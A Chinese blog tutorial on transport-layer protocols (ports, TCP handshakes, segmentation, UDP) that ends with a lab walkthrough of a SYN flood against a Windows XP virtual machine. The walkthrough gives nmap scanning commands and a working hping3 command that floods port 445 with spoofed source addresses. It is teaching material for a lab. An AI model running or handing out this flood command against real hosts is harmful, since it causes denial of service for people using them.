传输层协议(TCP和UDP以及传输层的安全威胁)

最新推荐文章于 2024-05-01 21:42:07 发布
最新推荐文章于 2024-05-01 21:42:07 发布
阅读量292 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络 网络协议 wireshark linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46008548/article/details/131692397
版权

目录

1.传输层简介

2 常见协议

2.1 TCP 为什么可靠?

2.2 分段与重组

2.3 UDP报文结构

2.4 TCP 和UDP的对比

2.5 传输层面临的安全威胁

1.传输层简介

传输层定义了主机应用程序之间端到端的连通性

一个应用程序 一般会对应计算机的一个端口号

端口号范围:

0~65535

其中 0-1023 对应公有协议

端到端通信:

2 常见协议

  • TCP 面向连接的、可靠的传输协议
  • UDP 面向无连接的 传输协议

2.1 TCP 为什么可靠?

TCP报文头格式:

  • 传输数据之前 要建立连接
  • 完成数据传输 要拆除连接
  • 确认机制 和 重传机制
  • 分段与重组

传输数据之前 要建立连接----> 三次握手

数据传输完成,拆除连接 四次挥手

2.2 分段与重组

在以太网环境中,一个数据包的大小最大是 1500字节

基于TCP的数据传输,会在TCP封装数据的时候,就提前将数据进行分段处理 ,每一个 segment(段)大小

1460字节。

一个 TCP的 MSS max segment size = 1460Bytes.

基于TCP传输的数据,不需要进行IP分片.

2.3 UDP报文结构

2.4 TCP 和UDP的对比

2.5 传输层面临的安全威胁

1.TCP拒绝服务——SYN Flood攻击

也叫做SYN半开连接攻击 ----- dos 拒绝服务攻击 denial of service

攻击者通过大量发送SYN报文,造成大量未完全建立的TCP连接,占用被攻击者的资源。

2.SYN 半开连接攻击实验(Syn Flood 实验)

准备环境:

一台 kali

一台 win7 或 xp ,让kali和 靶机 处于同一个 VMnet

发现靶机:

nmap

nmap -sP 192.168.63.0/24

#此地址根据两台虚拟机的VMnet进行更改,此次我使用的是192.168.63.0/24

扫描到两个地址

对 扫描到的 192.168.63.134 和 192.168.63.254 进一步分析

nmap -sV 192.168.63.134

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 04:44 EDT

Nmap scan report for 192.168.63.134

Host is up (0.00025s latency).

Not shown: 997 closed tcp ports (reset)

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

MAC Address: 00:0C:29:74:25:FE (VMware)

Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

通过分析可知,目标 192.168.63.134 大概是一个 XP 系统的 windows主机,开放的端口有 135 139 445

通过 向 192.168.63.134开放的 135、139或 445端口 发起 大量 SYN的连接,同时要伪装自己【伪装自己的源IP和源端口号】

使用如下命令展开测试:

hping3 -S -p 445 192.168.63.134 --rand-source --flood

参数说明:

-S 主机发送 SYN报文

-p 445 向目标主机的 445端口发送该报文

ip地址:1192.168.63.134 目标主机IP地址

--rand-source 随机源IP地址

--flood 泛洪发送大量的SYN报文

在kali上打开wireshark,抓取eth0网卡的数据,查看报文发送情况

在靶机上查看攻效果,此时靶机的CPU使用率到的100% 了,操作十分卡顿,及完成攻击。

 

YancyYue
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
传输层概念 TCP协议 UDP协议 TCPUDP的区别
04-09
传输层协议
传输层TCPUDP的区别
08-04
传输层TCPUDP的区别 TCP(Transmission Control Protocol,传输控制协议)和UDP(User Datagram Protocol,用户数据报协议)是两种常用的传输层协议,它们之间有着本质的区别。了解TCPUDP的区别对于网络协议的...
网络安全——传输层安全
qq_53633989的博客
11-16 2597
传输层主要负责提供端到端的数据传输,传输层在终端用户之间提供透明的数据传输,向上层提供可靠的数据传输服务。传输层在给定的链路上通过流量控制、分段/重组和差错控制来保证数据传输的可靠性。传输层的一些协议(如TCP)是面向连接的,这就意味着传输层能保持对分段的跟踪,并且重传那些失败的分段。
传输层安全(TLS)笔记
热门推荐
weixin_43586667的博客
02-05 1万+
一.什么是TLS TLS(Transport Layer Security,安全传输层),TLS是建立在传输层TCP协议之上的协议,服务于应用层,它的前身是SSL(Secure Socket Layer,安全套接字层),它实现了将应用层的报文进行加密后再交由TCP进行传输的功能。 ...
传输层安全性(TLS):保护互联网通信的隐私和完整性
最新发布
JAZJD的博客
05-01 1055
TLS(传输层安全性)是一种广泛采用的安全协议,用于保障互联网通信的私密性和数据完整性。它的主要目的是加密网络通信,确保数据在传输过程中不会被窃取、篡改或伪造。TLS主要用于保护Web应用程序和服务器之间的通信,使得敏感信息如用户登录凭据、信用卡信息等在传输过程中得到保护。此外,TLS还可以用于加密其他类型的通信,包括电子邮件、消息传递和IP语音(VoIP)等。TLS实现了加密、身份验证和完整性三大功能。在TLS握手过程中,通信双方协商TLS版本、密码套件,并进行身份验证,最终生成会话密钥用于加密通信。
计算机网络实验五——应用层和传输层协议分析
weixin_43973089的博客
05-28 6459
计算机网络实验五——应用层和传输层协议分析一、实验目的二、实验内容三、实验步骤(一)任务1: 从 PC 使用 URL 捕获 Web 请求1.配置Packet Tracer文件2.使用URL获取Web请求(二)任务2:访问服务器的HTTPS服务,捕获数据包并分析。1.任务要求2.捕获数据包3.分析(三)任务3:从PC访问服务器的FTP服务,捕获数据包并分析。1.任务要求2.具体步骤3.分析 一、实验目的 通过本实验,熟悉PacketTracer的使用,学习在PacketTracer中仿真分析应用层和传输层协议
网络安全——传输层安全协议
qq_44005305的博客
04-13 921
本周将会讲解传输层安全协议。了解SSL协议SSL协议对于用户而言是透明的,普通用户使用SSL进行网络连接的区别不外乎是浏览器地址栏中的URL地址是以https作为开头,地址栏最右端或状态栏会有一个挂锁或钥匙的图标。实际上,SSL是一个独立于平台和应用的协议。图4-1显示了SSL.在协议栈中的位置,用于保护基于TCP的应用,SSL在TCP层之上、应用层之下,就像TCP连接的套接字一样工作。SSL协议的主要目的是保障两个应用间通信的私密性和可靠性。SSL协议提供传输协议之上的可靠的端到端。
计算机网络-应用层和传输层协议分析实验(PacketTracer)
04-28 3649
计算机网络实验三
第3章 传输层协议UDPTCP
08-15
3.1 端到端通信和端口号 3.2 用户数据报协议UDP 3.3 传输控制协议TCP 3.4 TCPUDP的比较 习题
HC110110006 传输层协议
01-05
在本课程中,我们将学习传输层协议的基本概念、TCPUDP 两种协议的工作原理、报文格式、应用场景等内容。 一、传输层协议的定义 传输层协议定义了主机应用程序之间端到端的连通性,负责提供可靠的数据传输服务...
实验3 传输层与应用层协议.docx
02-06
实验三主要涵盖了传输层与应用层的四个关键协议:TCP(传输控制协议)、UDP(用户数据报协议)、HTTP(超文本传输协议)以及DNS(域名系统)。这些协议是互联网通信的基础,下面将逐一详细解释。 1. **TCP三次握手*...
【深圳大学网络安全】实验三 传输层安全实验
归忆_AC的博客
01-30 1458
将修改后的server.ovpn文件复制到目录“C:\Program Files\OpenVPN\config”下,把“C:\Program Files\OpenVPN\easy-rsa\keys”目录中的“ca.crt、ca.key、dh1024.pem、xipuserver.crt、xipuserver.csr、xipuserver.key”复制到“C:\Program Files\OpenVPN\config”目录下。SSL VPN 可以在任何地点,利用任何设备,连接到相应的网络资源上。
传输层安全
SS_Cucumber的博客
08-13 713
1.DOS的分类与介绍 DOS攻击和DDOS攻击 DDOS攻击基于网络层(IP、ICMP、ARP)和应用层   2.DOS攻击详解和防御措施 攻击类型:拒绝服务性攻击 DDOS攻击手段:SYN Flood           ACK Flood           connecting Flood           HTTP GET Flood(CC攻击) DB databa
协议安全——传输层
ChenD的学习笔记
10-14 358
传输层TCP/UDP传输层面临的风险
传输层安全验证
huryer的专栏
09-17 311
传输层安全验证 关键词 TCP SSL TLS Wireshark 配置tomcat场景 http:8002 未启用传输加密 https:8443 启用传输加密 Wireshark 1、确认网卡类型 打开网络连接,确认网络使用的网卡:以太网2 2、配置wireshark过滤 在wireshark主页,双击“以太网2”,输入过滤条件:tcp.port == 8002 || udp.port ==...
TCP/IP协议分析(传输层安全缺陷)
coderge's CSDN Blog.
01-12 5378
一、传输层及其协议 传输层向其上的应用层提供通信服务,属于通信部分的最高层,同时也是用户功能中的最低层。只有位于网络边缘的主机才有传输层网络核心部分的路由器只用到下三层的功能。 传输层为应用进程之间提供端到端的逻辑通信(网络层为主机之间提供逻辑通信)。 传输层需要对收到的报文进行差错检测。 运输层需要有两种不同的运输协议,即面向连接的 TCP 和无连接的 UDP。 传输控制协议(Transmi...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值